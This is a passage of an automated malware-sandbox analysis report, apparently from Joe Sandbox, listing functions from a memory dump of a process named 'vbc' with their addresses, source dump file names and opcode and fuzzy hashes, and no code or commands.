                                                                                                                        • Instruction Fuzzy Hash: 8390022620554442D104755C5488A16401687D0305FD5D451A10A4599DC6398951A131
                                                                                                                        Function 05372DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: df0c1505d9b70e53a1a41f03a5edf3d4c2fe8ce5eaae48513611298e51ecf81c
                                                                                                                        • Instruction ID: 9089b98c6418f79bca96048d224c024250827befa56f43ee8de8c38309933ba3
                                                                                                                        • Opcode Fuzzy Hash: df0c1505d9b70e53a1a41f03a5edf3d4c2fe8ce5eaae48513611298e51ecf81c
                                                                                                                        • Instruction Fuzzy Hash: A290023624150402D145715C4484616401A97D0341FD5C452A0464558E86598B56AA61
                                                                                                                        Function 05372DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd4e9ee76f79642795e7e1530ae298f21c1a3a169c4b58262e03e6ca18e8ecb9
                                                                                                                        • Instruction ID: b738a22eb5c9e8970dc5c607fe0fe2714d7bf26b2a94516a240d22ca9f6dada6
                                                                                                                        • Opcode Fuzzy Hash: bd4e9ee76f79642795e7e1530ae298f21c1a3a169c4b58262e03e6ca18e8ecb9
                                                                                                                        • Instruction Fuzzy Hash: F7900226242541525549B15C4484517801797E03417D5C452A1454954C852A9956D621
                                                                                                                        Function 05372C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 73a80656b17adc94b855ade580ad0d7d94c44ffe100cfb1fec68353bc929fd42
                                                                                                                        • Instruction ID: 09358585c9ddd8991d547fad67ce66d771175ff5ab7a126c5a989c2e72ac32c2
                                                                                                                        • Opcode Fuzzy Hash: 73a80656b17adc94b855ade580ad0d7d94c44ffe100cfb1fec68353bc929fd42
                                                                                                                        • Instruction Fuzzy Hash: 6690023620150842D104715C4484B56401687E0301FD5C456A0164658D8619C9517521
                                                                                                                        Function 05372CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b03a647b599f59f764f66ea307e5a98284434195cbb5d27d013cc2e7bc1d4512
                                                                                                                        • Instruction ID: aeebd41a51118d824c210a11f6e85aed168ac79fa852afd6bd3842669169c22a
                                                                                                                        • Opcode Fuzzy Hash: b03a647b599f59f764f66ea307e5a98284434195cbb5d27d013cc2e7bc1d4512
                                                                                                                        • Instruction Fuzzy Hash: 0B90023620150402D104759C5488656401687E0301FD5D451A5064559EC66989916131
                                                                                                                        Function 05372CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6401be99e8a5d7a79f260293bd4ea15f9d17c696cc51a2559e3edf0998210f8b
                                                                                                                        • Instruction ID: 3f8f42f9b1f8fe3437f03f83072693b6a12c1a74d7503cd6b9218609fe155db0
                                                                                                                        • Opcode Fuzzy Hash: 6401be99e8a5d7a79f260293bd4ea15f9d17c696cc51a2559e3edf0998210f8b
                                                                                                                        • Instruction Fuzzy Hash: B390023620150403D104715C5588717401687D0301FD5D851A046455CDD65A89516121
                                                                                                                        Function 05372CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 91b4be21186a7bf1bc66d5a5cdf9e33484c53abfbd652d8d33c6dd401e9c45dd
                                                                                                                        • Instruction ID: 50d6397d33b1bddccc107e3916fca51d62b80690605244b834eea628920238ae
                                                                                                                        • Opcode Fuzzy Hash: 91b4be21186a7bf1bc66d5a5cdf9e33484c53abfbd652d8d33c6dd401e9c45dd
                                                                                                                        • Instruction Fuzzy Hash: 1390022660550402D144715C5498716402687D0301FD5D451A0064558DC65D8B5566A1
                                                                                                                        Function 05372F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 06bdcb310b7fa50457a1a1c6dba7c26973564328e08952e353a127cf68085f63
                                                                                                                        • Instruction ID: 0a9abfe981ec5c7458e92e89ddbb66877f51372fc9427f148a383a34d387e60f
                                                                                                                        • Opcode Fuzzy Hash: 06bdcb310b7fa50457a1a1c6dba7c26973564328e08952e353a127cf68085f63
                                                                                                                        • Instruction Fuzzy Hash: 3B90026634150442D104715C4494B164016C7E1301FD5C455E10A4558D861DCD526126
                                                                                                                        Function 05372F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 907df7aae236523f82292a4796ac1908d333b2bddba07278d3e47d11e0974a6a
                                                                                                                        • Instruction ID: b9642e7183b7d348e50148c49bd442116861106d3464afb64b470e6e79202d29
                                                                                                                        • Opcode Fuzzy Hash: 907df7aae236523f82292a4796ac1908d333b2bddba07278d3e47d11e0974a6a
                                                                                                                        • Instruction Fuzzy Hash: 5490026621150042D108715C4484716405687E1301FD5C452A2194558CC52D8D615125
                                                                                                                        Function 05372FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a76940bb96ad873e1f6f879d6470f4479a09d697b5ff48bae2c0098ca5b089a8
                                                                                                                        • Instruction ID: 72700672fada185a857f7359e16ea600ac824be273349d9678323408ff6f9d72
                                                                                                                        • Opcode Fuzzy Hash: a76940bb96ad873e1f6f879d6470f4479a09d697b5ff48bae2c0098ca5b089a8
                                                                                                                        • Instruction Fuzzy Hash: 0A900226601500424144716C88C49168016ABE13117D5C561A09D8554D855D89655665
                                                                                                                        Function 05372FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6d796e3e0d35e4fc81cc8d87551d7fe9795062bdcf6f8af2a5546e5bebc6454a
                                                                                                                        • Instruction ID: a607381fd5023350a1b4134c96c62337eb0957c07f1dbc6403901fd901627608
                                                                                                                        • Opcode Fuzzy Hash: 6d796e3e0d35e4fc81cc8d87551d7fe9795062bdcf6f8af2a5546e5bebc6454a
                                                                                                                        • Instruction Fuzzy Hash: E590023620190402D104715C4888757401687D0302FD5C451A51A4559E8669C9916531
                                                                                                                        Function 05372F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e8e21645d16b01f07ec96feb2c779e52bfdad713ade97e6cfda3a47c8d7ac7bd
                                                                                                                        • Instruction ID: 28dd544adbed060ef1de0c54f3d3f1160649dd8657cdc6b13afeb7d9047075be
                                                                                                                        • Opcode Fuzzy Hash: e8e21645d16b01f07ec96feb2c779e52bfdad713ade97e6cfda3a47c8d7ac7bd
                                                                                                                        • Instruction Fuzzy Hash: 3390023620190402D104715C489471B401687D0302FD5C451A11A4559D862989516571
                                                                                                                        Function 05372FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c66e00590d6f669a62e69971965147c0c47a53ed5abbbbf031b9786c8617c3fb
                                                                                                                        • Instruction ID: 82655180cdb128f95a52786432cb9e8139b9fb170420c07d143ac3c6278ed91f
                                                                                                                        • Opcode Fuzzy Hash: c66e00590d6f669a62e69971965147c0c47a53ed5abbbbf031b9786c8617c3fb
                                                                                                                        • Instruction Fuzzy Hash: B0900226211D0042D204756C4C94B17401687D0303FD5C555A0194558CC91989615521
                                                                                                                        Function 05372E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 60d40983bec0c90f1626c9b465a674920a8f1b56430b2b9f9443bd2b538719f5
                                                                                                                        • Instruction ID: 4a36756dd85524e22c6371328794f51e2c7edbe4cc16541f7b07a15e98a3909f
                                                                                                                        • Opcode Fuzzy Hash: 60d40983bec0c90f1626c9b465a674920a8f1b56430b2b9f9443bd2b538719f5
                                                                                                                        • Instruction Fuzzy Hash: 7A90022630150402D106715C4494616401AC7D1345FD5C452E1464559D86298A53A132
                                                                                                                        Function 05372EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c051c8d0bc8d3ede727767d06b5df3433c7dcbed715e627d85bbfe28cc8452a6
                                                                                                                        • Instruction ID: b2c4e7000a0ed52ca1c671f6d42f2581d9aa4cdf7d7d0cec72cd1a6d80e323e9
                                                                                                                        • Opcode Fuzzy Hash: c051c8d0bc8d3ede727767d06b5df3433c7dcbed715e627d85bbfe28cc8452a6
                                                                                                                        • Instruction Fuzzy Hash: DA90027620150402D144715C4484756401687D0301FD5C451A50A4558E865D8ED56665
                                                                                                                        Function 05372E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 29ae8db1cf89daf06ed2b1a526a1404b823af8ba86b45be8260ea2ba23ecd9d2
                                                                                                                        • Instruction ID: 63f97e8df6756607b9d13f285538846b22f70e91b90b95d7cbfe87b93063e959
                                                                                                                        • Opcode Fuzzy Hash: 29ae8db1cf89daf06ed2b1a526a1404b823af8ba86b45be8260ea2ba23ecd9d2
                                                                                                                        • Instruction Fuzzy Hash: 5A90022660150502D105715C4484626401B87D0341FD5C462A1064559ECA298A92A131
                                                                                                                        Function 05372EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd4f8f2c0e772c578213898bdb5815b82f8f1a11109a36a0ec42c862f6b7689d
                                                                                                                        • Instruction ID: d4ecaa76f63ddc8f262eae55e0d2fde373c3c5957596c124699a197c94173521
                                                                                                                        • Opcode Fuzzy Hash: bd4f8f2c0e772c578213898bdb5815b82f8f1a11109a36a0ec42c862f6b7689d
                                                                                                                        • Instruction Fuzzy Hash: 1290026620190403D144755C4884617401687D0302FD5C451A20A4559E8A2D8D516135
                                                                                                                        Function 05372BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 554b6882086e498459998aed2a5b5aaa7679b0ab15cc19822d542443797229a1
                                                                                                                        • Instruction ID: 32bc0fc74c9ae8b7bf68275895e682bebf874e686745b397754749183f108a28
                                                                                                                        • Opcode Fuzzy Hash: 554b6882086e498459998aed2a5b5aaa7679b0ab15cc19822d542443797229a1
                                                                                                                        • Instruction Fuzzy Hash: 5B90023660550802D154715C4494756401687D0301FD5C451A0064658D87598B5576A1
                                                                                                                        Function 05372B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 84faa7547f0b9d61a67ca3fc46157e0b8129dbb26e7969214f56e61011ec3609
                                                                                                                        • Instruction ID: 4ddf13af021f67127f5a29785968c140c9be30661878b048624056c27c7f4ee1
                                                                                                                        • Opcode Fuzzy Hash: 84faa7547f0b9d61a67ca3fc46157e0b8129dbb26e7969214f56e61011ec3609
                                                                                                                        • Instruction Fuzzy Hash: DA90023620150802D108715C4884696401687D0301FD5C451A6064659E966989917131
                                                                                                                        Function 05372BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3fb7ba7f9555bf53aaeedd6d6e74a7b0668f3cef68be8e31abec6e2d1766dd56
                                                                                                                        • Instruction ID: 161cfec10c84e1e1c7c8fc72265fca816250ebbc176576fd2fe43502d761a63c
                                                                                                                        • Opcode Fuzzy Hash: 3fb7ba7f9555bf53aaeedd6d6e74a7b0668f3cef68be8e31abec6e2d1766dd56
                                                                                                                        • Instruction Fuzzy Hash: F290023620150802D184715C448465A401687D1301FD5C455A0065658DCA198B5977A1
                                                                                                                        Function 05372BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 67eb4405a8434125341e28c87ccb579f520fc8e82d3edc5d423ba7fdeebc5e00
                                                                                                                        • Instruction ID: 83e7515c98c1dc4cd997493c0ee664bf0a9fcc7a0fc664f3b39d33b0e8ba5d24
                                                                                                                        • Opcode Fuzzy Hash: 67eb4405a8434125341e28c87ccb579f520fc8e82d3edc5d423ba7fdeebc5e00
                                                                                                                        • Instruction Fuzzy Hash: 9090023620554842D144715C4484A56402687D0305FD5C451A00A4698D96298E55B661
                                                                                                                        Function 05372AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 520fb99a8a2ebc7f494442996cba72395dc2447a26414bfb84b34c0241a1a345
                                                                                                                        • Instruction ID: 0d280df713cfb363a3ea6e9b94d374b261a084e77887e00f61d384dc8d2c7e03
                                                                                                                        • Opcode Fuzzy Hash: 520fb99a8a2ebc7f494442996cba72395dc2447a26414bfb84b34c0241a1a345
                                                                                                                        • Instruction Fuzzy Hash: 9B9002A6201640924504B25C8484B1A851687E0301BD5C456E1094564CC52989519135
                                                                                                                        Function 05372AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f91ff371c7940098d797e211c6a3dd8f41030c1cae1b46dc4b9b350de563ae17
                                                                                                                        • Instruction ID: 694fee898a3136ce2163422cdf2f25428abc283b8f39865cb7e6de3f05b3cb4c
                                                                                                                        • Opcode Fuzzy Hash: f91ff371c7940098d797e211c6a3dd8f41030c1cae1b46dc4b9b350de563ae17
                                                                                                                        • Instruction Fuzzy Hash: ED90022A221500020149B55C068451B445697D63513D5C455F1456594CC62589655321
                                                                                                                        Function 05372AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cde7532831a82502e584d195c6f902fdec8b5948e338ee68dffc5b02f13bc4a2
                                                                                                                        • Instruction ID: d4ef2d62670f7e4792d6979d23606ae770407f4058ce3ba9cb8fa09fe0bf8f4d
                                                                                                                        • Opcode Fuzzy Hash: cde7532831a82502e584d195c6f902fdec8b5948e338ee68dffc5b02f13bc4a2
                                                                                                                        • Instruction Fuzzy Hash: 2290043F31150003010DF55C07C45174057C7D53513D5C471F1055554CD735CD715131
                                                                                                                        Function 05373010 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d774915a5c7bdd08de1a0062ef92d5c075a5e5a0c64e48345ca2275dcaf038b3
                                                                                                                        • Instruction ID: d45ca0dbf10f405065a94ca1c1b5d8ae2928d347b86f665dd1493c8a3d0470c7
                                                                                                                        • Opcode Fuzzy Hash: d774915a5c7bdd08de1a0062ef92d5c075a5e5a0c64e48345ca2275dcaf038b3
                                                                                                                        • Instruction Fuzzy Hash: 6B90022620194442D144725C4884B1F811687E1302FD5C459A4196558CC91989555721
                                                                                                                        Function 05373090 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 46feda8f1fd62fd0f79e1d1a0f677496f9679e9bf90a6363194b1999596db209
                                                                                                                        • Instruction ID: 93531095a1dd244fa5617aa992b7df721d61b5cec7ffbbf49530298dd404e580
                                                                                                                        • Opcode Fuzzy Hash: 46feda8f1fd62fd0f79e1d1a0f677496f9679e9bf90a6363194b1999596db209
                                                                                                                        • Instruction Fuzzy Hash: E490022624150802D144715C84947174017C7D0701FD5C451A0064558D861A8A6566B1
                                                                                                                        Function 05373D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f0af1ac9cd3daf9a048437e8c831efa77b583f3e42b7851d2c2119c6e2ae3e17
                                                                                                                        • Instruction ID: 9c27daa5f1b1cb4df5397b95d834a6f456e102c804edf0cfd578ac36371bbe4c
                                                                                                                        • Opcode Fuzzy Hash: f0af1ac9cd3daf9a048437e8c831efa77b583f3e42b7851d2c2119c6e2ae3e17
                                                                                                                        • Instruction Fuzzy Hash: D1900236202501429544725C5884A5E811687E1302BD5D855A0055558CC91889615221
                                                                                                                        Function 05373D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a088d10eb149952d383ab8081fce6c0f14d7a97d2d0bbcc6f9ff6fdab0a89121
                                                                                                                        • Instruction ID: 12c486d38bc85d641e4cebce990a175fff31729ef6845b72a4cbf9b72ee2bebc
                                                                                                                        • Opcode Fuzzy Hash: a088d10eb149952d383ab8081fce6c0f14d7a97d2d0bbcc6f9ff6fdab0a89121
                                                                                                                        • Instruction Fuzzy Hash: 7C90023A20150402D514715C5884656405787D0301FD5D851A046455CD865889A1A121
                                                                                                                        Function 053739B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 58a29bed287f78e0291bb8923858165e329e1ea4bb583483c734c7727412b616
                                                                                                                        • Instruction ID: 2badd955516fc7489a9446fbf1665fcdcee9cf5d2572af58a52ea2c7b1a06e59
                                                                                                                        • Opcode Fuzzy Hash: 58a29bed287f78e0291bb8923858165e329e1ea4bb583483c734c7727412b616
                                                                                                                        • Instruction Fuzzy Hash: 4890022624555102D154715C44846268016A7E0301FD5C461A0854598D855989556221
                                                                                                                        Function 05372C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction ID: 1dfb236e98f8bcecffd27fba41c6d95192442dafdd122e6a46f99403fdf6a817
                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Function 05372890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
